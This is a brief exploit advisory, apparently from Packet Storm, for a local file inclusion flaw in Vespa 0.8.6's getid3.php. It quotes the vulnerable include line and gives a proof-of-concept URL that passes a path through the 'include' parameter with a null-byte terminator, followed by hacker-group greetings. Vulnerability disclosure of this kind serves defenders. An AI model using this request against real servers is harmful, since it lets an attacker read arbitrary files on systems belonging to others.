Vespa version 0.8.6 suffers from a local file inclusion vulnerability.
cf24e83609926ab13eeef81a31c7b6fa1ec0bf14be1ed5fd5ed5fd0f561f146d# Exploit Title: [vespa 0.8.6 Local File Inclusion]
# Date: [05/02/2012]
# Author: [T0x!c]
# Software Link: [http://vespa.willinger.cc/]
# Version: [vespa 0.8.6]
# Tested on: [Windows XP]
:::::::::::::::::::::::::
=================Exploit=================
-=[ vuln c0de ]=-
/vespa/getid3/getid3.php
363 // include module
364 include_once(GETID3_INCLUDEPATH.$determined_format['include']);
----exploit----
POC : http://[ Address ]/[ Path ]/getid3/getid3.php?include=[LFI]%00
================================greatz================================================
Greatz to :
* KedAns-Dz * Caddy-Dz * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * Kalashinkov
and ALL Akgerian Hackers
EnJoY o_O
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed